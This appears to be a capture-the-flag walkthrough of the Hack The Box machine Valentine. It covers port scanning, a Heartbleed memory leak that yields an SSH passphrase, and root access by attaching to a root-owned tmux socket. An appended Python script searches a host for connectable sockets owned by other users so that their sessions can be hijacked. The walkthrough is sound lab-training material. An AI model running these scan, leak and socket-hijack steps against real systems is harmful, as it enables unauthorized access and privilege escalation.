Machine Creator: mrb3n
Let's start with a quick Nmap SYN scan of all 65535 ports to discover what's open. The rate and retry flags trade accuracy for speed, so re-scan any port that looks closed if the results seem off:
nmap -sS --min-rate 5000 --max-retries 1 -p- 10.10.10.79
Web Directory Enumeration
Let’s use Gobuster to search for directories.
If we browse the directories from the Gobuster scan, we can see a couple of files in the dev directory.
Since the host also serves HTTPS, let's check the TLS service for known vulnerabilities. Nmap ships NSE scripts for this; we can find the SSL-related ones by listing the scripts directory and filtering with grep:
ls /usr/share/nmap/scripts/ | grep "ssl"
nmap --script=ssl-heartbleed -p 443 10.10.10.79
The image on the website itself also hints at this vulnerability.
There is a Metasploit module for Heartbleed, but let's do this exploit manually with a Python proof-of-concept script from GitHub [1]. Each run returns a different slice of the server's memory, so it can take several attempts before anything useful shows up.
Piecing everything together, we can now SSH into Valentine: the RSA private key file hype_key from the dev directory, the passphrase heartbleedbelievethehype recovered from the Heartbleed leak, and the username hype (as in hype_key) give us user access. Restrict the key file's permissions (mode 600) first, or ssh will refuse to use it.
We can read user.txt as user hype.
tmux -S /.devs/dev_sess
Attaching to that root-owned tmux session through its socket gives us a root terminal: tmux -S talks to whichever server listens on the socket, and any user allowed to connect to it gets a shell running as the server's owner.
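Why this works, and how to look for such a socket on another host, as an added Python example that is not part of the original writeup: connect(2) on an AF_UNIX socket is gated by the write bit on the socket inode, so a root-owned tmux server whose socket is group- or world-writable will attach for anyone who passes that check. The filesystem walk root, the pretend uid and group set used in `demo()`, and the assumption that the box's socket is group-writable by our user are this edit's assumptions, not facts from the page.

```python
"""Why `tmux -S /.devs/dev_sess` works: connect(2) on an AF_UNIX socket needs write
permission on the socket inode, so a root-owned tmux server with a group- or
world-writable socket hands its shell to whoever can connect.  Added example, not
from the original writeup; the walk root and the constructed demo socket are assumptions."""
import os
import socket
import stat
import tempfile

def can_connect(st: os.stat_result, uid: int, groups) -> bool:
    """Unix DAC check applied to connect() on a socket: the write bit that
    matches the caller.  root bypasses it."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in groups:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def is_live(path: str) -> bool:
    """True if a server is actually listening behind the socket file."""
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        s.connect(path)
        return True
    except OSError:
        return False
    finally:
        s.close()

def find_candidate_sockets(root: str = "/", uid=None, groups=None) -> list:
    """Sockets owned by someone else that we can still connect to: the
    precondition for hijacking their tmux session.  /proc and /sys are skipped."""
    uid = os.getuid() if uid is None else uid
    groups = set(os.getgroups()) if groups is None else set(groups)
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath.startswith(("/proc", "/sys")):
            dirnames[:] = []
            continue
        for name in filenames:                               # os.walk lists sockets as files
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISSOCK(st.st_mode):
                continue
            if st.st_uid != uid and can_connect(st, uid, groups):
                hits.append({"path": path, "owner_uid": st.st_uid,
                             "mode": oct(stat.S_IMODE(st.st_mode)), "live": is_live(path)})
    return hits

def demo() -> dict:
    """Offline run with a constructed socket: bind one, set it 0660 (the assumed
    shape of the box's socket) and evaluate the check as a pretend other user."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "dev_sess")
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(path)
        srv.listen(5)
        os.chmod(path, 0o660)
        st = os.lstat(path)
        other = st.st_uid + 1                                # not the owner, not root
        out = {
            "group_member": can_connect(st, other, {st.st_gid}),
            "outsider": can_connect(st, other, set()),
            "live": is_live(path),
            "found_by_walk": [h["path"] for h in find_candidate_sockets(d, other, {st.st_gid})] == [path],
        }
        os.chmod(path, 0o666)                                # world-writable: everyone gets in
        out["outsider_after_0666"] = can_connect(os.lstat(path), other, set())
        srv.close()
    return out
```

On a real target, run `find_candidate_sockets()` as the low-privileged user and look at the `live` entries; a socket that is connectable but dead is just a stale file, while a live one owned by root is worth a `tmux -S <path>`.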